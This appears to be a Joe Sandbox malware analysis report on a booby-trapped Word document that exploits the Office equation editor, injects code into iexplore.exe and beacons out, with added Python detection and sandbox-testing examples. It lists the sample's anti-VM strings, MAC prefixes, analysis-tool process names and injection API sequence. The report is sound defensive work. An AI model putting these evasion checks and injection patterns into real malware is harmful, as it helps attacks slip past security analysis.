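The summary for this sample reads: spawns its own target (the suspended iexplore.exe the report records), starts two remote threads, and frees the remote buffer afterwards. The subsequence matcher is intentionally order-sensitive and gap-tolerant; if the list had shown WriteProcessMemory before VirtualAllocEx the injection pattern would not match, which is the right outcome for a recorded trace.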

Anti Debugging:

Contains functionality to register its own exception handler
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B2860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_617B2860
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F32A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004F32A0
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_0051A460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0051A460
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to dynamically determine API calls
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143

Malware Analysis System Evasion:

Contains functionality to query system information
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517535 GetSystemInfo,3_2_00517535
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
  Source: iexplore.exe | Binary or memory string: vmtools.exe
  Source: iexplore.exe | Binary or memory string: SYSTEM\ControlSet001\services\Disk\Enum0x3A RegOpenKeyExW Disk Failed-%d0vmwareqemuvboxvirtualhdSoftware\CommViewSoftware\eEye Digital SecuritySoftware\Win SnifferSoftware\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32Software\Syser SoftSoftware\Classes\Folder\shell\sandboxSoftware\Classes\*\shell\sandboxSYSTEM\CurrentControlSet\Services\IRIS5SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WiresharkSOFTWARE\ZxSnifferSYSTEM\CurrentControlSet\Services\VBoxGuestSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest AdditionsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSandboxie%svboxtray.exevboxservice.exevmwareuser.exevmwaretray.exevmupgradehelper.exevmtoolsd.exevmacthlp.exevmtools.exeirise.exeIrisSvc.exewireshark.exeZxSniffer.exeRegshot.exeollydbg.exewindbg.exePEBrowseDbg.exeSyser.exeSandboxieRpcSs.exeSandboxieDcomLaunch.exe%02X%02X%02X%02X%02X%02X 000569000C29001C1400505600155D00163E080027H
  Source: iexplore.exe | Binary or memory string: SYSTEM\CurrentControlSet\Services\VBoxGuest
  Source: iexplore.exe | Binary or memory string: vmware
  Source: iexplore.exe | Binary or memory string: vmwaretray.exe
  Source: iexplore.exe | Binary or memory string: vmwareuser.exe
  Source: iexplore.exe | Binary or memory string: vmtoolsd.exe
  Source: iexplore.exe | Binary or memory string: vboxservice.exe
  Source: iexplore.exe | Binary or memory string: vboxtray.exe
Contains functionality to query network adapter information
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,___swprintf_l,realloc,___swprintf_l,___swprintf_l,realloc,___swprintf_l,realloc,___swprintf_l,??3@YAXPAX@Z,3_2_005177AB
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514B82
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514AAC
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
  Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 816
Found dropped PE file which has not been started or loaded
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\a.b
May sleep (evasive loops) to hinder dynamic analysis
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3440 | Thread sleep time: -60000s >= -60000s (2 identical entries)
  Source: C:\Windows\explorer.exe TID: 3540 | Thread sleep time: -180000s >= -60000s
  Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3536 | Thread sleep time: -60000s >= -60000s
Contains functionality to detect sandboxes (MAC address check)
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1 (3 identical entries)
Contains functionality to detect sandboxes (registry check)
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC (11 identical entries)
Contains functionality to detect virtual machines (IN, VMware)
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F278F in eax, dx 3_2_004F278F
Tries to detect sandboxes and other dynamic analysis tools (process name)
  Source: iexplore.exe | Binary or memory string: WINDBG.EXE
  Source: iexplore.exe | Binary or memory string: IRISE.EXE
  Source: iexplore.exe | Binary or memory string: SANDBOXIERPCSS.EXE
  Source: iexplore.exe | Binary or memory string: WIRESHARK.EXE
  Source: iexplore.exe | Binary or memory string: IRISSVC.EXE
  Source: iexplore.exe | Binary or memory string: ZXSNIFFER.EXE
  Source: iexplore.exe | Binary or memory string: PEBROWSEDBG.EXE
  Source: iexplore.exe | Binary or memory string: SYSER.EXE
  Source: iexplore.exe | Binary or memory string: OLLYDBG.EXE
  Source: iexplore.exe | Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
  Source: iexplore.exe | Binary or memory string: REGSHOT.EXE
Tries to detect virtual machines
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: vboxtray.exe vboxservice.exe vboxservice.exe vmwareuser.exe vmwaretray.exe vmtoolsd.exe vmtools.exe 3_2_004F2A05
  Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: vmware qemu qemu vbox 3_2_004F27E5
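The evasion entries above show exactly what the injected payload compares against: a run of 42 hex digits (000569000C29001C1400505600155D00163E080027) that the %02X%02X%02X%02X%02X%02X format string next to it identifies as seven MAC OUI prefixes, plus a fixed list of VM-tool, debugger and sniffer process names. The Python below is an added example, not part of the Joe Sandbox report, that re-implements those two checks so an analysis VM can be tested against them before the next detonation. OUI_BLOB and the process names are taken from the memory string in this report; the vendor attribution of each prefix and the sample MACs and process snapshot in the test are this example's own (labelled as assumed in the code). The IN-instruction VMware check in function 3_2_004F278F is a CPU-level probe and is not reproduced here.

```python
"""Re-implement the sandbox checks this sample performs, to test an analysis VM against them.

Added example, not part of the Joe Sandbox report. OUI_BLOB and VM_TOOL_PROCESSES come from
the memory string the report shows for iexplore.exe; the vendor labels in OUI_VENDOR are
this example's assumed attribution, not something the report states."""
import re

OUI_BLOB = "000569000C29001C1400505600155D00163E080027"
OUI_VENDOR = {  # assumed vendor attribution for the prefixes in OUI_BLOB
    "000569": "VMware", "000C29": "VMware", "001C14": "VMware", "005056": "VMware",
    "00155D": "Hyper-V", "00163E": "Xen", "080027": "VirtualBox",
}
# Process names the sample compares against (from the same memory string, lower-cased).
VM_TOOL_PROCESSES = {
    "vboxtray.exe", "vboxservice.exe", "vmwareuser.exe", "vmwaretray.exe",
    "vmupgradehelper.exe", "vmtoolsd.exe", "vmacthlp.exe", "vmtools.exe",
    "irise.exe", "irissvc.exe", "wireshark.exe", "zxsniffer.exe", "regshot.exe",
    "ollydbg.exe", "windbg.exe", "pebrowsedbg.exe", "syser.exe",
    "sandboxierpcss.exe", "sandboxiedcomlaunch.exe",
}

def split_ouis(blob: str) -> list[str]:
    """The sample stores its OUI list as one hex run; cut it into 6-digit prefixes."""
    if len(blob) % 6 or not re.fullmatch(r"[0-9A-Fa-f]+", blob):
        raise ValueError("not a run of 6-hex-digit OUIs")
    return [blob[i:i + 6].upper() for i in range(0, len(blob), 6)]

def normalise_mac(mac: str) -> str:
    """Accept 00:0c:29:..., 00-0C-29-... or bare hex and return 12 upper-case hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"bad MAC: {mac!r}")
    return digits

def mac_vendor_hit(mac: str, ouis=None):
    """The virtualisation vendor whose OUI the MAC carries, or None if it is not on the list."""
    prefix = normalise_mac(mac)[:6]
    ouis = ouis if ouis is not None else split_ouis(OUI_BLOB)
    return OUI_VENDOR.get(prefix, "unknown-VM-OUI") if prefix in ouis else None

def sandbox_exposure(macs, running_processes):
    """What this sample would learn on a host with the given MACs and process names."""
    return {
        "mac_hits": {m: v for m in macs if (v := mac_vendor_hit(m))},
        "process_hits": sorted(p.lower() for p in running_processes
                               if p.lower() in VM_TOOL_PROCESSES),
    }
```

If sandbox_exposure reports anything for the analysis guest, the sample would have taken the evasive path there; in this run it evidently did not, since the payload went on to beacon and persist. Overriding the guest's MAC to a non-virtual OUI and renaming or hiding the guest-tools processes removes both signals, while the registry keys listed in the same memory string (VBoxGuest, Wireshark uninstall entries, the Sandboxie shell handlers) need separate treatment.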

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (54 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_617B3362 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter  2_2_617B3362
Contains functionality to query the account / user name
Source: C:\Program Files\Internet Explorer\iexplore.exe  Code function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA  3_2_00517143
Queries the cryptographic machine GUID
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query locale information (e.g. system language)
Source: C:\Program Files\Internet Explorer\iexplore.exe  Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__swprintf_c_l  3_2_00516DF6
Queries information about the installed CPU (vendor, model number etc.)
Source: C:\Program Files\Internet Explorer\iexplore.exe  Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
Queries the product ID of Windows
Source: C:\Program Files\Internet Explorer\iexplore.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId  (2 identical entries)
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Program Files\Internet Explorer\iexplore.exe  Code function: 3_2_005163DA GetLocalTime followed by cmp: cmp word ptr [esp+12h], 0010h and CTI: jne 005164DCh  3_2_005163DA
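Each signature above is benign in isolation (every installer reads ProductId, every localized application calls GetLocaleInfo); what makes the block worth a second look is that one injected process collects several identity attributes of the host in a row. The following is an added example, not Joe Sandbox's signature code, showing how a triage script can reproduce that reasoning over a sandbox trace: it maps API names and registry value paths to fingerprinting categories and flags a process only when it satisfies several distinct categories. The `pid|kind|detail` line format, the category weights and the sample trace are constructed for illustration.

```python
"""Score host-fingerprinting behaviour per process from an API/registry trace.

Added example (not Joe Sandbox code). The trace format below is an assumption:
one event per line as "<pid>|<api|reg>|<detail>".
"""
import re
from collections import defaultdict

# Indicator categories taken from the 'Language, Device and Operating System
# Detection' signatures: API names or registry value paths that satisfy each.
INDICATORS = {
    "machine_guid": {"reg": [r"\\SOFTWARE\\Microsoft\\Cryptography MachineGuid$"]},
    "product_id":   {"reg": [r"\\Windows NT\\CurrentVersion ProductId$"]},
    "cpu_info":     {"reg": [r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor"]},
    "user_name":    {"api": ["GetUserNameA", "GetUserNameW"]},
    "locale":       {"api": ["GetLocaleInfoA", "GetLocaleInfoW"]},
    "local_time":   {"api": ["GetLocalTime", "GetSystemTime", "GetSystemTimeAsFileTime"]},
}

# Constructed sample trace (not a real sandbox export): pid 2 stands in for
# EQNEDT32.EXE, pid 3 for the injected iexplore.exe, pid 4 for a bystander.
SAMPLE_TRACE = """\
2|api|GetSystemTimeAsFileTime
2|api|GetTickCount
2|reg|HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid
3|api|GetUserNameA
3|api|GetLocaleInfoA
3|reg|HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor
3|reg|HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion ProductId
3|api|GetLocalTime
4|api|CreateFileW
"""

LINE_RE = re.compile(r"^(?P<pid>\d+)\|(?P<kind>api|reg)\|(?P<detail>.+)$")


def parse_trace(text):
    """Return (pid, kind, detail) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((int(m["pid"]), m["kind"], m["detail"]))
    return events


def match_categories(events):
    """Map pid -> set of fingerprinting categories its events satisfied."""
    hits = defaultdict(set)
    for pid, kind, detail in events:
        for cat, spec in INDICATORS.items():
            if kind == "api" and detail in spec.get("api", ()):
                hits[pid].add(cat)
            elif kind == "reg" and any(re.search(p, detail) for p in spec.get("reg", ())):
                hits[pid].add(cat)
    return dict(hits)


def score_fingerprinting(text, threshold=3):
    """Flag a process once it collects `threshold` distinct host attributes.

    A single GetLocalTime or ProductId read is normal; the combination of
    user name + locale + CPU + product ID in one process is the signal.
    Returns pid -> (sorted categories, flagged).
    """
    hits = match_categories(parse_trace(text))
    return {pid: (sorted(cats), len(cats) >= threshold) for pid, cats in hits.items()}


if __name__ == "__main__":
    for pid, (cats, flagged) in sorted(score_fingerprinting(SAMPLE_TRACE).items()):
        print(f"pid {pid}: {'FLAG' if flagged else 'ok  '} {cats}")
```

The threshold of three is a starting point, not a tuned value; raise it if the rule fires on legitimate installers. The last signature in the list (GetLocalTime followed by a compare and a conditional jump) is the one to treat with most care: a date-gated payload shows nothing in a sandbox run on the wrong day, so a second detonation with a shifted clock is the check to make before declaring the sample inert.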

Behavior Graph

Behavior Graph ID: 487031   Sample: DoNotOpen2.doc   Start date: 24/01/2018   Architecture: WINDOWS   Score: 96

Sample-level signatures:
  • Document exploit detected (drops PE files)
  • May check the online IP address of the machine
  • Contains functionality to detect virtual machines (IN, VMware)
  • 8 other signatures

Processes started from the sample (bracketed numbers are the graph's file / registry counters, in the order the graph shows them):
  • EQNEDT32.EXE [1]  signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); starts iexplore.exe
  • WINWORD.EXE [72 32]  dropped: C:\Users\user~1\AppData\Local\Temp\a.b, PE32
  • EQNEDT32.EXE [47]
  • 2 other processes

iexplore.exe [1 9] (started by EQNEDT32.EXE):
  • DNS: api.ipaddress.com  signature: May check the online IP address of the machine
  • api.ipaddress.com 209.126.119.177, local port 49188, port 80, SERVER4YOU-server4youIncUS, United States
  • 103.236.150.14, local port 49189, port 80, IDNIC-SERVERKEREN-AS-IDPTExaRekatekProsolusiID, Indonesia
  • dropped: C:\Users\user\AppData\...21avShExt.dll, PE32
  • signature: Creates an autostart registry key pointing to binary in C:\Windows
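The chain in the graph (EQNEDT32.EXE started from the document, then iexplore.exe started by EQNEDT32.EXE) is the one to alert on, and the detail that matters operationally is that the equation editor is not a child of WINWORD.EXE: it is launched out-of-process by OLE, so a rule that only watches WINWORD.EXE's children misses it. The following is an added example, not Joe Sandbox's signature code, that reconstructs process ancestry from process-creation events and flags any process with EQNEDT32.EXE anywhere above it, including grandchildren such as a shell spawned by the injected browser. The CSV event format and the sample events are constructed for illustration.

```python
"""Flag processes descended from EQNEDT32.EXE in process-creation events.

Added example (not Joe Sandbox code). The event format is an assumption:
CSV with columns pid,ppid,image,command_line, one process creation per row.
"""
import csv
import io
import ntpath

# The signature "Office equation editor starts processes" keys on this image.
EQUATION_EDITOR = "eqnedt32.exe"

# Constructed events. Note EQNEDT32.EXE (pid 1300) has a parent (600) that is
# not WINWORD.EXE: the editor is launched via OLE/DCOM with "-Embedding".
SAMPLE_EVENTS = """\
pid,ppid,image,command_line
1200,800,C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE,"WINWORD.EXE /n DoNotOpen2.doc"
1300,600,C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE,"EQNEDT32.EXE -Embedding"
1400,1300,C:\\Program Files\\Internet Explorer\\iexplore.exe,"iexplore.exe"
1500,1200,C:\\Windows\\splwow64.exe,"splwow64.exe 12288"
1600,1400,C:\\Windows\\System32\\cmd.exe,"cmd.exe /c echo constructed"
"""


def parse_events(text):
    """Parse the CSV into dicts with int pids; image paths keep backslashes."""
    rows = csv.DictReader(io.StringIO(text))
    return [{"pid": int(r["pid"]), "ppid": int(r["ppid"]),
             "image": r["image"], "cmd": r["command_line"]} for r in rows]


def ancestry(events, pid):
    """Return image basenames from `pid` up to the root seen in the events.

    Stops at an unknown parent or a pid cycle (pid reuse can produce one).
    """
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid]["image"]).lower())
        pid = by_pid[pid]["ppid"]
    return chain


def equation_editor_alerts(text):
    """Alert on every process whose ancestry contains the equation editor.

    Checking the whole ancestry (chain[1:]) rather than the direct parent
    catches cmd.exe under iexplore.exe under EQNEDT32.EXE as well.
    """
    events = parse_events(text)
    alerts = []
    for e in events:
        chain = ancestry(events, e["pid"])
        if EQUATION_EDITOR in chain[1:]:
            alerts.append((e["pid"], " <- ".join(chain)))
    return alerts


if __name__ == "__main__":
    for pid, chain in equation_editor_alerts(SAMPLE_EVENTS):
        print(f"ALERT pid {pid}: {chain}")
```

On a real endpoint feed, EQNEDT32.EXE starting at all is rare enough after the 2018 patches that the parent image alone is a usable indicator; the ancestry walk is what keeps the alert attached to the later stages (the browser process doing the IP lookup, the dropped DLL, the autostart key) once the editor itself has exited.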

Simulations

Behavior and APIs

Time      Type             Description
19:15:15  API Interceptor  340x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 5000ms
19:15:17  API Interceptor  3x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 5000ms
19:15:18  API Interceptor  938x Sleep call for process: explorer.exe modified from: 60000ms to: 5000ms
19:15:20  API Interceptor  2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 5000ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot